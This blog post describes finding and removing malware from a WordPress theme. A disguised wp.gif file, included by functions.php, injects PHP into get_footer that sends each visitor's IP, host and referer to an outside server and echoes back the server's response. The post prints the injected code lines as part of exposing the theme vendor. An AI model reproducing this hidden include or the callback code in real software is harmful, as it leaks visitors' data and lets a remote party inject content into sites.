Warning: URL file-access is disabled in the server configuration
After installing one of the HireWordPressExperts.com theme, I got warning on my frontpage that it’s not safe to load scripts file_get_contents() from http://24365online.com/_YTG_yu/_dl/get_info.php?…
Warning directed me to look script from general-template.php file and I found suspicious script:
/*** HWEDLC ***/
…
$url = “http://24365online.com/_YTG_yu/_dl/get_info.php?host=$host&referer=$referer&visitor_ip=$visitor_ip”;
$content = file_get_contents($url);
echo $content;
After removing the script and refresing browser warning was gone, but second refresh brought back the same warning
I was sure this warning is caused some of the new theme files, so I tried to search similar content from inside of these files. Unfortonately Windows isn’t indexing php files, but lucily Visual Studio was able to find file. Surprisingly string was found from image file wp.gif. Soon I discovered that functions.php file tried to include wp.gif file into source code. Wp.gif file was adding additional code into get_footer function.
In the end solution was quite simple:
- Remove wp.gif file
- Remove include or require command from functions.php
- Clean the get_footer function from wp-includes/general-template.php file
I’m still believe in that the script is just a advertice, but HireWordPressExperts.com could do example XSS vulnerability into your service or mess up the layout.
Would you hire “experts” that are using this kind of marketing strategies?
